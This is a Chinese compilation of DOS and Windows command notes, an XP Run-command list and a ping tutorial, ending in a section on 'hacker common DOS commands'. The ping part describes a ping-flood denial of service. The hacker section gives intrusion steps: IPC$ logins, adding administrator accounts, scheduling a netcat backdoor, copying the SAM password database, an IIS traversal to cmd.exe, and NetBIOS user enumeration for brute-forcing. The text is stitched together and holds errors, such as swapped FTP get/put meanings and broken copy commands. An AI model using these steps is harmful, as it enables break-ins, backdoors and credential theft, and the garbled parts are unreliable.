注意:interlnk 必須在裝入interlnk.exe 設備驅動程序才可以使用.
所用的驅動器符號與config.?sys中lastdrv.exe設置的數目有關.可以作一個一
端為25針,另一端為9針的串列線實現,具體接線方式如下:
5 - 7 2 - 15
3 - 2 3 - 13
7 - 4 4 - 12
6 - 6 5 - 10
3 - 3 6 - 11
8 - 5 15 - 2
4 - 20 13 - 3
9針 25針 12 - 4
10 - 5
11 - 6
25 - 25
25針 25針
十六、interlnk.exe 與intersvr.exe
interlnk.exe 重新定向對於客戶驅動器或列印介面的請求到另外的伺服器驅動
器或列印機.
語法:config.sys 中加入:
device=c:\dos\interlnk.exe [drive:n][/noprinter][com][lpt]
十七、memmaker[/b][/batch][session][/swap:drive]
使用memmaker能夠優化內存配置,?並將配置寫入autoexec.bat和config.sys中.
在這一過程中,需要重新啟動幾次機器.
十八、memitem memcolor memdefault submenu 菜單選項include
autoexec.bat 中如下: config.sys中如下:
path c:\dos;c:\ucdos [menu]
doskey menucolor=15,1(前景色15,背景色1)
\mouse\mouse menuitem=base_config,this is a base
goto %config% ->選擇項 menuitem=cced_config,this is a cced
選項 提示
:base_config menudefault=base_config,5
goto exit ->跳出 預設為base_config,延遲時間5秒
:cced_config [common]
c:\dos\smartdrv.exe /l device=c:\dos\himem.sys
goto exit 各項都包含的共同部分
:exit ->結束 [base_config]
device=c:\dos\emm386.exe ram
dos=high,umb
[cced_config]
device=c:\dos\smartdrv.exe/double_buffer
include=base_config 包含base_config設置
可以根據計算機的在不同情況下的配置要求來選擇.
十九、mscdex.exe 提供對光碟機進行讀寫的程序
mscdex/d:drive [/D:drive][/e][/k][/s][/l:letter]
典型:config.sys 中device=c:\cdrom\cdrom.sys /d:mscd000
autoexec.bat中 c:\dos\mscdex /d:mscd000 /l:g
配置了一個光碟機,符號為g
參數/d:drive1為光碟機身份號,須與config.sys中的符號一致,可有多個
/d:mscd000 /d:mscd001
/e:使用擴展內存裝入光碟機驅動程序.
/s:使光碟機在ms_net或windows是否設置為共享光碟機
/V是否在載入時顯示內存.
/L:letter 分配給光碟機的盤符
/m:number 指定緩沖器的數目
應該注意的是:?如果用smartdrv.exe 加速對光碟機的讀寫能力,應該在autoexec.
bat中將mscdex.?exe 寫在smartdrv.exe 之前,smartdrv.exe的使用可大幅提高
對驅動器的讀寫能力.
二十、msd的使用
使用msd 可以整體檢查計算機配置及系統信息
包括:?驅動器參數,計算機cpu參數,內存大小參數,顯示器類型,串.並口情況,以
及各個IRQ佔用情況,據此可以分析新增設備是否與原來設備有沖突.
同時也可以通過分析內存駐留程序,判斷內存中是否有病毒,有則標為"???".
二十一、prompt dos提示符
$q 等於號 $t 當前時間 $d 當前日期 $p 當前驅動器符號
$$ $號提示 $n當前驅動器 $g 大於號 $l小於號 $b 顯示"|"管道號
$h 隱去提示符 $E顯示"<-"號
對於其它文字,則直接顯示文本本身prompt ljw,則顯示為ljw提示符
prompt 則僅顯示當前驅動器號及大於號.
二十二、ramdrive.sys 使用內存當做虛擬盤來使用
應注意,所有數據都存在於內存中,應及時將其存到硬碟中,否則掉電後或者死機
後將丟失全部數據,優點是運行速度快,但不能在windows中使用.
示例:config.sys: device=c:\dos\ramdrive.sys /size[/e|a]
size為以k為單位的位元組數,即建立的虛擬盤的大小.
/e或/a 都是使用擴展內存來建立虛擬盤,?加參數的前提是必須先載入內存管理
器himem.sys及emm386.exe.
二十三、subst 將一個驅動器與一個子目錄聯接
如:將對A:\l1\l2 子目錄的請求映射為S盤,則輸入
subst s: a:\l1\l2 即可
這樣使用dir s:?等命令則顯示的是a:\l1\l2子目錄下的內容,其它 del 一樣
可以用subst s: d 來取消這種映射.
可以用subst 來顯示各種聯接情況
注意:?可以採用subst a: c:a 來建立一個對於A的讀寫盤.對於某些安裝軟體
來說,?必須使用A盤來安裝,就可以使用先將所要安裝的軟體全部拷貝到C:a子
目錄中,然後輸入subst a: c:a,再轉到A:,就可以進行軟體的安裝了.
二十四、mem /c /m /p /d 常規內存顯示程序
/c顯示所有內存駐留程序的佔用情況,分為conventional常規內存和uppermemory
高端內存佔用,並顯示總的佔用情況(常規 高端 保留 擴展內存)
/p分頁顯示,頁間暫停
/m後加模塊名 如:/m msdos 顯示dos系統內存的佔用.
/d對常規 高端 保留 擴展內存加以詳細例表說明
通過分析,可以看出內存佔用是否合理,以及各種程序是否正常載入,從而在此基
礎上使用內存優化工具memmaker進行各種管理,同時又可以分析出一些程序死機
的原因,若有的地方顯示"???",則可以斷定內存中有病毒的存在,有利於發現及消滅.
二十五、各種管道工具的使用"> < >> <<"
將各種命令造成的輸出或所需要的輸入重新定向
如:dir *.bat /b>p 可以將dir *.bat 例出的文件名輸出到p文件中.
time<p>>p.bat
p文件中僅存在一個回車符,則可以將時間追加進p.bat文件中
"> >>" 是將命令產生的輸出重新定向,比如到文件或列印機中.
>>產生的內容將追加進文件中,>則將原文件內容覆蓋.
"< <<" 是將命令所需要輸入的內容重新定向.
如:time<p 在批中可以是時間代碼或回車符,可以以此改變時間.
需要說明的是 "prn "為列印機, "null"為空設備
con 為顯示器
type p.bat>prn 可將p.bat列印出來.
null p 可將p文件刪除掉
con p 可以在屏幕上編輯p文件,F6可以存檔退出
type p>pp 完成p文件到pp 的復制
type p|more 可在屏滿時暫停顯示
二十六、move 命令
move [y/-y] filename1 filename2
將文件1移動到文件2處
如:move c:\dos\*.* c:\cced
將dos子目錄下的所有文件全部移動到cced 子目錄下
/y|-y參數在目標目錄不存在需要創建時,是否出現提示
可以使用該命令修改子目錄名稱,如 move dos cced
將dos目錄名改為cced
二十七、append 指定一些特殊數據文件的存放位置,如user.dat pe2.pro等一些非*.
exe *.com *.bat 文件
格式:append [:]終止以前存在的指定目錄 append 顯示指定情況
append [path] append c:\user 等
二十八、
call 在一個批處理命令中調用另外一個批處理文件
(1)不終止現有文件的運行,執行完掉用程序後立即返回.
(2)被調用批處理命令必須以bat 為擴展名
(3)調用批處理文件時,可以加上參數(%1-%9)以及環境變數如%baud%
(4)不能使用管道工具及重定向工具
二十九、device devicehigh loadhigh
device 將指定的設備驅動程序裝入內存中
devicehigh將指定的設備驅動程序裝入高端內存中
loadhigh 將指定的設備驅動程序裝入高端內存中
三十、defrag 優化磁碟
legend(傳奇) optimize(優化) elapse(逝去) fragment(碎片)
該命令執行對指定的盤進行優化處理(包括檢查文件分配表,各文件狀態,糾正錯
誤),在執行時,可按照文件名大小,時間,擴展名對文件進行排序.
④ XP下的運行命令
開始-運行-命令大全
1. gpedit.msc-----組策略
2. sndrec32-------錄音機
3. Nslookup-------IP地址偵測器
4. explorer-------打開資源管理器
5. logoff---------注銷命令
6. tsshutdn-------60秒倒計時關機命令
7. lusrmgr.msc----本機用戶和組
8. services.msc---本地服務設置
9. oobe/msoobe /a----檢查XP是否激活
10. notepad--------打開記事本
11. cleanmgr-------垃圾整理
12. net start messenger----開始信使服務
13. compmgmt.msc---計算機管理
14. net stop messenger-----停止信使服務
15. conf-----------啟動netmeeting
16. dvdplay--------DVD播放器
17. charmap--------啟動字元映射表
18. diskmgmt.msc---磁碟管理實用程序
19. calc-----------啟動計算器
20. dfrg.msc-------磁碟碎片整理程序
21. chkdsk.exe-----Chkdsk磁碟檢查
22. devmgmt.msc--- 設備管理器
23. regsvr32 /u *.dll----停止dll文件運行
24. drwtsn32------ 系統醫生
25. rononce -p ----15秒關機
26. dxdiag---------檢查DirectX信息
27. regedt32-------注冊表編輯器
28. Msconfig.exe---系統配置實用程序
29. rsop.msc-------組策略結果集
30. mem.exe--------顯示內存使用情況
31. regedit.exe----注冊表
32. winchat--------XP自帶區域網聊天
33. progman--------程序管理器
34. winmsd---------系統信息
35. perfmon.msc----計算機性能監測程序
36. winver---------檢查Windows版本
37. sfc /scannow-----掃描錯誤並復原
38. taskmgr-----任務管理器(2000/xp/2003
39. winver---------檢查Windows版本
40. wmimgmt.msc----打開windows管理體系結構(WMI)
41. wupdmgr--------windows更新程序
42. wscript--------windows腳本宿主設置
43. write----------寫字板
44. winmsd---------系統信息
45. wiaacmgr-------掃描儀和照相機向導
46. winchat--------XP自帶區域網聊天
47. mem.exe--------顯示內存使用情況
48. Msconfig.exe---系統配置實用程序
49. mplayer2-------簡易widnows media player
50. mspaint--------畫圖板
51. mstsc----------遠程桌面連接
52. mplayer2-------媒體播放機
53. magnify--------放大鏡實用程序
54. mmc------------打開控制台
55. mobsync--------同步命令
56. dxdiag---------檢查DirectX信息
57. drwtsn32------ 系統醫生
58. devmgmt.msc--- 設備管理器
59. dfrg.msc-------磁碟碎片整理程序
60. diskmgmt.msc---磁碟管理實用程序
61. dcomcnfg-------打開系統組件服務
62. ddeshare-------打開DDE共享設置
63. dvdplay--------DVD播放器
64. net stop messenger-----停止信使服務
65. net start messenger----開始信使服務
66. notepad--------打開記事本
67. nslookup-------網路管理的工具向導
68. ntbackup-------系統備份和還原
69. narrator-------屏幕「講述人」
70. ntmsmgr.msc----移動存儲管理器
71. ntmsoprq.msc---移動存儲管理員操作請求
72. netstat -an----(TC)命令檢查介面
73. syncapp--------創建一個公文包
74. sysedit--------系統配置編輯器
75. sigverif-------文件簽名驗證程序
76. sndrec32-------錄音機
77. shrpubw--------創建共享文件夾
78. secpol.msc-----本地安全策略
79. syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
80. services.msc---本地服務設置
81. Sndvol32-------音量控製程序
82. sfc.exe--------系統文件檢查器
83. sfc /scannow---windows文件保護
84. tsshutdn-------60秒倒計時關機命令
85. tourstart------xp簡介(安裝完成後出現的漫遊xp程序)
86. taskmgr--------任務管理器
87. eventvwr-------事件查看器
88. eudcedit-------造字程序
89. explorer-------打開資源管理器
90. packager-------對象包裝程序
91. perfmon.msc----計算機性能監測程序
92. progman--------程序管理器
93. regedit.exe----注冊表
94. rsop.msc-------組策略結果集
95. regedt32-------注冊表編輯器
96. rononce -p ----15秒關機
97. regsvr32 /u *.dll----停止dll文件運行
98. regsvr32 /u zipfldr.dll------取消ZIP支持
99. cmd.exe--------CMD命令提示符
100. chkdsk.exe-----Chkdsk磁碟檢查
101. certmgr.msc----證書管理實用程序
102. calc-----------啟動計算器
103. charmap--------啟動字元映射表
104. cliconfg-------SQL SERVER 客戶端網路實用程序
105. Clipbrd--------剪貼板查看器
106. conf-----------啟動netmeeting
107. compmgmt.msc---計算機管理
108. cleanmgr-------垃圾整理
109. ciadv.msc------索引服務程序
110. osk------------打開屏幕鍵盤
111. odbcad32-------ODBC數據源管理器
112. oobe/msoobe /a----檢查XP是否激活
113. lusrmgr.msc----本機用戶和組
114. logoff---------注銷命令
115. iexpress-------木馬捆綁工具,系統自帶
116. Nslookup-------IP地址偵測器
117. fsmgmt.msc-----共享文件夾管理器
118. utilman--------輔助工具管理器
Windows下Ping命令詳解
ping只有在安裝了TCP/IP協議以後才可以使用:
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s
count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list
Options:
-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.
不停的ping地方主機,直到你按下Control-C。
此功能沒有什麼特別的技巧,不過可以配合其他參數使用,將在下面提到。
-a Resolve addresses to hostnames.
解析計算機NetBios名。
示例:C:\>ping -a 192.168.1.21
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Ping statistics for 192.168.1.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
從上面就可以知道IP為192.168.1.21的計算機NetBios名為iceblood.yofor.com。
-n count Number of echo requests to send.
發送count指定的Echo數據包數。
在默認情況下,一般都只發送四個數據包,通過這個命令可以自己定義發送的個數,對衡量網路速度很有幫助,比如我想測試發送50個數據包的返回的平均時間為多少,最快時間為多少,最慢時間為多少就可以通過以下獲知:
C:\>ping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
………………
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
從以上我就可以知道在給202.103.96.68發送50個數據包的過程當中,返回了48個,其中有兩個由於未知原因丟失,這48個數據包當中返回速度最快為40ms,最慢為51ms,平均速度為46ms。
-l size Send buffer size.
定義echo數據包大小。
在默認的情況下windows的ping發送的數據包大小為32byt,我們也可以自己定義它的大小,但有一個大小的限制,就是最大隻能發送65500byt,也許有人會問為什麼要限制到65500byt,
因為Windows系列的系統都有一個安全漏洞(也許還包括其他系統)就是當向對方一次發送的數據包大於或等於65532時,對方就很有可能擋機,所以微軟公司為了解決這一安全漏洞於是限制了ping的數據包大小。雖然微軟公司已經做了此限制,但這個參數配合其他參數以後危害依然非常強大,比如我們就可以通過配合-t參數來實現一個帶有攻擊性的命令:(以下介紹
帶有危險性,僅用於試驗,請勿輕易施於別人機器上,否則後果自負)
C:\>ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
………………
這樣它就會不停的向192.168.1.21計算機發送大小為65500byt的數據包,如果你只有一台計算機也許沒有什麼效果,但如果有很多計算機那麼就可以使對方完全癱瘓,我曾經就做過這樣的試驗,當我同時使用10台以上計算機ping一台Win2000Pro系統的計算機時,不到5分鍾對方的網路就已經完全癱瘓,網路嚴重堵塞,HTTP和FTP服務完全停止,由此可見威力非同小可。
-f Set Don't Fragment flag in packet.
在數據包中發送「不要分段」標志。
在一般你所發送的數據包都會通過路由分段再發送給對方,加上此參數以後路由就不會再分段處理。
-i TTL Time To Live.
指定TTL值在對方的系統里停留的時間。
此參數同樣是幫助你檢查網路運轉情況的。
-v TOS Type Of Service.
將「服務類型」欄位設置為 tos 指定的值。
-r count Record route for count hops.
在「記錄路由」欄位中記錄傳出和返回數據包的路由。
在一般情況下你發送的數據包是通過一個個路由才到達對方的,但到底是經過了哪些路由呢?通過此參數就可以設定你想探測經過的路由的個數,不過限制在了9個,也就是說你只能跟蹤到9個路由,如果想探測更多,可以通過其他命令實現,我將在以後的文章中給大家講解。以下為示例:
C:\>ping -n 1 -r 9 202.96.105.101 (發送一個數據包,最多記錄9個路由)
Pinging 202.96.105.101 with 32 bytes of data:
Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 ->
202.107.210.214 ->
61.153.112.70 ->
61.153.112.89 ->
202.96.105.149 ->
202.96.105.97 ->
202.96.105.101 ->
202.96.105.150 ->
61.153.112.90
Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
從上面我就可以知道從我的計算機到202.96.105.101一共通過了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97這幾個路由。
-s count Timestamp for count hops.
指定 count 指定的躍點數的時間戳。
此參數和-r差不多,只是這個參數不記錄數據包返回所經過的路由,最多也只記錄4個。
-j host-list Loose source route along host-list.
利用 computer-list 指定的計算機列表路由數據包。連續計算機可以被中間網關分隔(路由稀疏源)IP 允許的最大數量為 9。
-k host-list Strict source route along host-list.
利用 computer-list 指定的計算機列表路由數據包。連續計算機不能被中間網關分隔(路由嚴格源)IP 允許的最大數量為 9。
-w timeout Timeout in milliseconds to wait for each reply.
指定超時間隔,單位為毫秒。
此參數沒有什麼其他技巧。
ping命令的其他技巧:在一般情況下還可以通過ping對方讓對方返回給你的TTL值大小,粗略的判斷目標主機的系統類型是Windows系列還是UNIX/Linux系列,一般情況下Windows系列的系統返回的TTL值在100-130之間,而UNIX/Linux系列的系統返回的TTL值在240-255之間,當然TTL的值在對方的主機里是可以修改的,Windows系列的系統可以通過修改注冊表以下鍵值實現:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:000000ff
255---FF
128---80
64----40
32----20
正常情況下,當我們使用Ping命令來查找問題所在或檢驗網路運行情況時,我們需要使用許多Ping命令,如果所有都運行正確,我們就可以相信基本的連通性和配置參數沒有問題;如果某些Ping命令出現運行故障,它也可以指明到何處去查找問題。下面就給出一個典型的檢測次序及對應的可能故障:
•ping 127.0.0.1
這個Ping命令被送到本地計算機的IP軟體,該命令永不退出該計算機。如果沒有做到這一點,就表示TCP/IP的安裝或運行存在某些最基本的問題。
•ping 本機IP
這個命令被送到我們計算機所配置的IP地址,我們的計算機始終都應該對該Ping命令作出應答,如果沒有,則表示本地配置或安裝存在問題。出現此問題時,區域網用戶請斷開網路電纜,然後重新發送該命令。如果網線斷開後本命令正確,則表示另一台計算機可能配置了相同的IP地址。
•ping 區域網內其他IP
這個命令應該離開我們的計算機,經過網卡及網路電纜到達其他計算機,再返回。收到回送應答表明本地網路中的網卡和載體運行正確。但如果收到0個回送應答,那麼表示子網掩碼(進行子網分割時,將IP地址的網路部分與主機部分分開的代碼)不正確或網卡配置錯誤或電纜系統有問題。
•ping 網關IP
這個命令如果應答正確,表示區域網中的網關路由器正在運行並能夠作出應答。
•ping 遠程IP
如果收到4個應答,表示成功的使用了預設網關。對於撥號上網用戶則表示能夠成功的訪問Internet(但不排除ISP的DNS會有問題)。
•ping localhost
localhost是個作系統的網路保留名,它是127.0.0.1的別名,每太計算機都應該能夠將該名字轉換成該地址。如果沒有做到這一帶內,則表示主機文件(/Windows/host)中存在問題。
•ping www.xxx.com(如www.yesky.com 天極網)
對這個域名執行Ping www.xxx.com 地址,通常是通過DNS 伺服器 如果這里出現故障,則表示DNS伺服器的IP地址配置不正確或DNS伺服器有故障(對於撥號上網用戶,某些ISP已經不需要設置DNS伺服器了)。順便說一句:我們也可以利用該命令實現域名對IP地址的轉換功能。
如果上面所列出的所有Ping命令都能正常運行,那麼我們對自己的計算機進行本地和遠程通信的功能基本上就可以放心了。但是,這些命令的成功並不表示我們所有的網路配置都沒有問題,例如,某些子網掩碼錯誤就可能無法用這些方法檢測到。
⑤ windows運行命令
打開控制面板control
計算機管理compmgmt.msc
注銷命令logoff
注冊表regedit
系統加密(一旦加密就不能解開,保護windowsxp系統的雙重密碼)syskey
任務管理器taskmgr
自動更新wuaucpl.cpl
開機啟動項msconfig
windows使用運行命令打開開機啟動項步驟:
1、點擊windows+R快捷鍵調出windows運行界面。
⑥ 誰有DOS命令的解釋哦.
ATTRIB 文件屬性(顯示或改變屬性)
CHDIR(CD) 改變目錄
CHKDSK 檢查磁碟
CHOICE 提示擊鍵輸入
CLS 清屏幕
COMMAND 重新載入MS-DOS程序
COPY 復制文件
DATE 設置顯示日期
DEBUG 調試程序
DEFRAG 清除磁碟碎片
DEL(ERASE) 刪除文件
DELOLDOS 刪除舊DOS文件
DELTREE 刪除目錄樹分支
DIR 顯示目錄
DISKCOMP 比較軟盤內容
DISKCOPY 復制磁碟
DOS 擴展擴充內存管理
DOSSHELL DOS外層
DRIVPARM 定義驅動器參數
EDIT 編輯器
EMM386 內存管理
ERASE 刪除文件
DBLSPACE 磁碟壓縮
EXPAND 釋放壓縮
FASTHELP 快速求助
FC 文件比較
FDISK 磁碟分區
FIND 搜尋指定字串
FOR 循環執行命令
FORMAT 格式化磁碟
MEM 內存使用情況顯示
MKDIR(MD) 建立子目錄
MSAV 檢查和清除病毒
MSBACKUP 磁碟文件務份
PATH 設置搜索路徑
PAUSE 暫停執行命令
RESTORE 磁碟文件轉儲
RENAME(REN) 文件重新命名
RMDIR(RD) 刪除目錄
SCANDISK 檢查磁碟
SYS 傳送系統文件
TIME 設置顯示時間
TREE 顯示目錄結構
TYPE 顯示文件內容
UNDELETE 恢復被刪除文件
VER 顯示系統版本號
VOL 顯示卷標
VSAFE 病毒檢查
XCOPY 復制組文件
APPEND 補充路徑
BREAK 檢查控制中斷
BUFFERS 設置磁碟緩沖區數
CALL 調用批文件
CHCP 轉換碼頁
COUNTRY 確定國家標准貨幣
CTTY 改變控制台
DEVICE 安裝設備驅動程序
DEVICEHIGH 裝載設備驅動程序
ECHO 命令顯示開關
FASTOPEN 快速載入文件
FCBS 使用文件控制塊
FILES 同時打開文件數
GOTO 轉向分支
GRAPHICS 圖形屏幕列印
HELP 求助
IF 設定條件
INCLUDE 簡化多重配置塊
INSTALL 安裝常駐程序
INTERLNK 計算機互連
INTERSVR 與伺服器互連
KEYB 裝載字元轉換表
LABEL 卷標
LASTDRIVE 置最大驅動器數
LOADFIX 裝入固定內存
LOADHIGH(LH) 高內存程序裝載
MEMMAKER 檢查內存
MENUCOLOR 設置顯示選項
MODE 設置硬體工作方式
MSCDEX 訪問CD驅動器
MSO 檢查系統配置
NLSFUNC 支持各國語言
NUMLOCK 控制NUMLOCK鍵
POWER 節省電能
PRINT 後台列印
PROMPT 改變系統提示
QBASIC 啟動QB
REM 注釋信息
REPLACE 替換文件
SET 設置環境變數
SETUP 安裝DOS6。2文件
SETVER 改變DOS版本表
SHARE 網路文件共享
SHELL 裝載命令處理程序
SMARTDRV 磁碟緩沖
SORT 文件排序
STACKS 支持動態使用的數據線
SUBMENU 菜單項(配置CONFIG。SYS)
SUBST 設置虛擬驅動器
SWITCHES 鍵盤開關
VRIFY 磁碟檢驗
》:建立子目錄命令 MD (內部命令)
功能:在指定盤的指定目錄下建立一個子目錄
格式:MD [盤符][路徑]子目錄名
注意:1。不能建立根目錄與目標目錄下已經存在的目錄
2。預設路徑時則表示在當前目錄下建立
2》:改變當前目錄目錄命令: CD (內部命令)
功能:設置指定盤的當前目錄
格式:CD [盤符][路徑]
注意:CD 表示顯示當前目錄
CD..表示退回到根目錄
CD/ 表示退回到上一級目錄
3》:刪除子目錄命令:RD (內部命令)
功能: 從指定的盤符上刪除子目錄
格式: CD [盤符][路徑]子目錄名
注意:1。要刪除的目錄必須為空目錄,如果不為空目錄,先來到該目錄,用 DEL *.*刪除該目錄下的所有內容
再回到上一級目錄,用RD命令刪除該目錄
2。不能刪除當前目錄與根目錄
4》:列文件目錄命令:DIR (內部命令)
功能:顯示指定盤、指定目錄下所包含的文件與下一級子目錄的有關信息
格式:DIR [盤符][路徑][文件名][/P][/W]
[/P]表示分屏顯示
[/W]表示壓縮顯示
5》:顯示全盤目錄命令:TREE (外部命令)
功能:顯示指定盤的目錄結構
格式:[盤符][路徑]TREE [盤符1][/F]
[/F]表示列出各級子目錄的文件名
6》:設置查找目標命令PATH (內部命令)
功能:設置外部文件的查找目錄
格式: PATH [盤符][路徑][;盤符][路徑]……
注意:1。顯示上次PATH命令設置的查找文件目錄命令用:
PATH
2。刪除上次PATH命令設置的文件查找目錄用:
PATH;
7》:刪除目錄命令:DELTREE
功能:將整個目錄及其子目錄和文件全部刪除
格式:DELLTREE [盤符][路徑]目標文件
注意:全部刪除、不論是否系統、隱藏、還是只讀
黑客常用dos命令(轉)
一般黑客入侵所需要的幾個常用命令
1:NET
只要你擁有某IP的用戶名和密碼,那就用IPC$做連接吧!
這里我們假如你得到的用戶是hbx,密碼是123456。假設對方IP為127.0.0.1
net use \\127.0.0.1\ipc$ "123456" /user:"hbx"
退出的命令是
net use \\127.0.0.1\ipc$ /delte
下面的操作你必須登陸後才可以用.登陸的方法就在上面.
----------------------
下面我們講怎麼創建一個用戶,由於SA的許可權相當於系統的超級用戶.
我們加一個hei的用戶密碼為lovechina
net user hei lovechina /add
只要顯示命令成功,那麼我們可以把他加入Administrator組了.
net localgroup Administrators hei /add
----------------------
這里是講映射對方的C盤,當然其他盤也可以,只要存在就行了.我們這里把對方的C盤映射到本地的Z盤.
net use z:\\127.0.0.1\c$
----------------------
net start telnet
這樣可以打開對方的TELNET服務.
----------------------
這里是將Guest用戶激活,guest是NT的默認用戶,而且無法刪除呢?不知道是否這樣,我的2000就是刪除不了它。
net user guest /active:yes
----------------------
這里是把一個用戶的密碼改掉,我們把guest的密碼改為lovechina,其他用戶也可以的。只要有許可權就行了呀!
net user guest lovechina
net命令果然強大啊!
2:at
一般一個入侵者入侵後都會留下後門,也就是種木馬了,你把木馬傳了上去,怎麼啟動他呢?
那麼需要用AT命令,這里假設你已經登陸了那個伺服器。
你首先要得到對方的時間,
net time \\127.0.0.1
將會返回一個時間,這里假設時間為12:1,現在需要新建一個作業,其ID=1
at \\127.0.0.1 12:3 nc.exe
這里假設了一個木馬,名為NC.EXE,這個東西要在對方伺服器上.
這里介紹一下NC,NC是NETCAT的簡稱,為了方便輸入,一般會被改名.它是一個TELNET服務,埠為99.
等到了12:3就可以連接到對方的99埠.這樣就給對方種下了木馬.
3:telnet
這個命令非常實用,它可以與遠方做連接,不過正常下需要密碼、用戶,不過你給對方種了木馬,直接連到這個木馬打開的埠.
telnet 127.0.0.1 99
這樣就可以連到對方的99埠.那你就可以在對方運行命令了,這個也就是肉雞.
4:FTP
它可以將你的東西傳到對方機子上,你可以去申請個支持FTP上傳的空間,國內多的是,如果真的找不到,我給個www.51.NET,不錯的.當我們申請完後,它會給用戶名,密碼,以及FTP伺服器.
在上傳前需要登陸先,這里我們假設FTP伺服器是www.51.NET,用戶名是HUCJS,密碼是654321
ftp www.51.net
他會要求輸入用戶,成功後會要求輸入密碼.
----------------------
下面先說上傳,假設你需上傳的文件是INDEX.HTM,它位於C:\下,傳到對方D:\
get c:\index.htm d:\
假設你要把對方C盤下的INDEX.HTM,下到你的機子的D盤下
put c:\index.htm d:\
5:
下面我說說怎樣把本地的文件復制到對方硬碟上去,需要建立好IPC$連接才有效。
這里我們把本地C盤下的index.htm復制到127.0.0.1的C盤下
index.htm \\127.0.0.1\c$\index.htm
----------------------
如果你要復制到D盤下把C改為D,就行了!
index.htm \\127.0.0.1\d$\index.htm
----------------------
如果你要把他復制到WINNT目錄里
就要把輸入
index.htm \\127.0.0.1\admin$\index.htm
admin$是winnt
----------------------
要把對方的文件復制過來,順便告訴大家NT的備份的資料庫放在x:\winnt\repair\sam._ sam._是資料庫的文件名
下面就把127.0.0.1的資料庫復制到本地C盤下
\\127.0.0.1\admin$\repair\sam._ c:\
----------------------
6:set
如果你跑進了一部機子,而且想黑他(這思想只能在特別時候才准有),當然他的80埠要開,不然你黑給誰看。這時需要用SET命令!
下面是我得到的結果!我來分析它,只是找主頁在那而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=當前登陸者的IP,這里本來是顯示我的IP,被我刪除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主頁放在的地址,只要你看到PATH_TRANSLATED=的後面就是主頁的存放地址。這里是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0對方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
粉紅色的那行就是對方主頁存放地址,這里告訴大家一個技巧,很笨的技巧啊,不過只能用這個方法才能100%的找到主頁的名稱,當你DIR這個目錄時,一定會看到很多文件,你可以把所有文件在瀏覽器這樣輸入XX.XX.XX.XX/文件名,這樣只要看到和XX.XX.XX.XX看到的也面一模一樣,那麼這就是主頁的名稱了。
7:nbtstat
如果你掃到一部NT的機子,他的136到139其中一個埠開了的話,就要用這個命令得到用戶了。順便告訴大家這是netbios,得到用戶名後就可以猜猜密碼了。例如比較簡單的密碼,密碼和用戶名一樣的,都試下,不行就暴力破解吧!
現在網上很多NT的機子都開了這些埠的,你可以練習下,我們來分析得到的結果。
命令是
nbtstat -A XX.XX.XX.XX
-A一定要大寫哦。
下面是得到的結果。
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
